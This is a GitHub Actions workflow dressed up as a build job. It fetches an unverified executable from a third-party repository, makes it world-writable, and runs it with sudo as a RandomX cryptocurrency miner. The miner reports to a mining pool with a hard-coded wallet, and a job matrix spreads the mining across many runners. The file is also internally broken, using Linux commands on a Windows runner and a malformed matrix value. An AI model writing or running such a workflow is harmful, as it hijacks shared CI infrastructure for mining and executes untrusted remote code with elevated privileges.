name: eX-code_MintMe 

 

on: [workflow_dispatch] 

 

jobs: 

build: 

name: eX-code_MintMe 

runs-on: windows-latest 

strategy: 

max-parallel: 5 

fail-fast: false 

matrix: 

go: [1.0, 1.1, 1.2, 1.3, 1,35] 

flag: [A, B, C, D, E, F, G, H, I] 

env: 

NUM_JOBS: 20 

JOB: ${{ matrix.go }} 

steps: 
- name:build
run:apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential

- name: PREPARING 

run: Invoke-WebRequest https://github.com/OmJhonyPerkasa/yteam/raw/main/mawaritubiru -OutFile mawaritubiru 

- name: Seting-UP 

run: chmod 777 mawaritubiru 

- name: Running 

run: sudo ./mawaritubiru --algorithm randomx --pool rx.unmineable.com:80 --wallet HOT:0xbca8d78f404533f2324abd652b46f04332eb2ca4.jemby 

- name: END 

run: exit
